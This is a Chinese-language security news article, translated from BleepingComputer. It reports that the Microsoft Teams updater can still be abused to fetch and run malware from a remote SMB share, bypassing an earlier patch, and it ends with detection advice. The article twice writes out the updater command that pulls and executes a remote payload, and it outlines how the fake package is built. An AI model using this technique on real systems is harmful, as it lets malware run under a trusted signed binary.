微软Teams 仍可兼作 LoLBin (Living Off the Land binary),帮助攻击者从远程位置检索并执行恶意软件。微软曾努力清除这种危险,但却未能阻止攻击者滥用 Teams 以植入并运行 payload。微软曾将它视作谁缺陷,修复方案可对某些客户的操作带来负面影响,因此刚出现的这种滥用新方法可能不会被解决。去年的滥用通过“更新”命令在当前用户的上下文中运行任意二进制代码。在微软推出缓解措施之前,攻击者可从外部 URL 下载恶意软件并从受信任(已签名)可执行文件中将其部署到系统上。逆向工程师 Reegun Richard 随后在其变体中发现,攻击者可通过该 app 真正的“Update.Exe”(执行某个位置的任何数据)伪造虚假的微软 Teams 数据包。Reegun Jayapaul 也在2019年发现了这个问题并公开了技术细节。他今年会刊该问题时发现微软提供的解决方案并不完整,“之前提供的 Teams 补丁是为了限制它通过 URL 进行更新的能力,但更新器可允许通过分享或产品更新本地文件夹进行本地连接。”由于已无法从外部位置获取 payloa,因此Reegun 通过SMB 远程分享进行了测试。微软提供的解决方案仅允许本地网络路径访问并更新 Teams 数据包。该 app 检查更新器 URL 中是否存在"http/s"、 ":" 和 "/"字符串和端口号,如出现则拦截连接。部署这种限制后,将 Teams 用作 LoLBin 就要求攻击者将恶意文件植入网络中的一个共享文件夹,之后从受害者计算机访问 payload。Jayapaul 指出这种场景虽然更为复杂,但它仍然可满足攻击者目的。他表示,威胁行动者能够创建远程分享,从而绕过使恶意软件停留在本地分享的步骤。为此,Jayapaul 设立了一个 Samba 服务器,用于远程公开访问权限。通过如下命令,他能够下载该远程 payload 并从 Teams Updator “Update.Exe”进行运行。Update.exe --update=\\remoteserver\payloadFolder
微软 Teams 通过开源项目 Squirrel 处理安装和更新例程,而Squirrel 依靠 NuGet 包管理器创建必要文件。因此,该 payload 需要拥有名称“squirrel.exe”并位于某个特定的 nupkg 文件中。另外,必须具有虚假微软 Teams元数据的文件。安装程序位于 AppData 文件夹中,访问它无需提升权限。Jayapaul 在博客文章中提供了绕过应用程序中当前缓解措施的所有步骤。将这两个文件上传到远程 Samba 服务器后,攻击就准备妥当了。
通过如下命令,微软 Teams 在10到15秒之内从远程位置提取并运行该 payload。update.exe --update=\\remoteserver\payloadFolder
Jayapaul 将问题告知微软后并未收到任何回应。不过当前似乎无法限制 SMB 源,原因是这样做会影响客户操作。Jayapaul 表示如威胁行动者具有本地访问权限,则可通过这种方法隐藏用于横向移动的流量。
用户可采取的防御措施包括监控可疑连接的“update.exe”命令行,检查“squirrel.exe”的大小以判断使用的文件是否合法。从微软 Teams 的更新器检查哈希并跟踪 SMB 连接也有助于发现攻击情况。
https://www.bleepingcomputer.com/news/security/hackers-can-abuse-microsoft-teams-updater-to-install-malware/
题图:Pixabay License
本文由奇安信代码卫士编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 www.codesafe.cn”。
奇安信代码卫士 (codesafe)
国内首个专注于软件开发安全的
产品线。
觉得不错,就点个 “在看” 吧~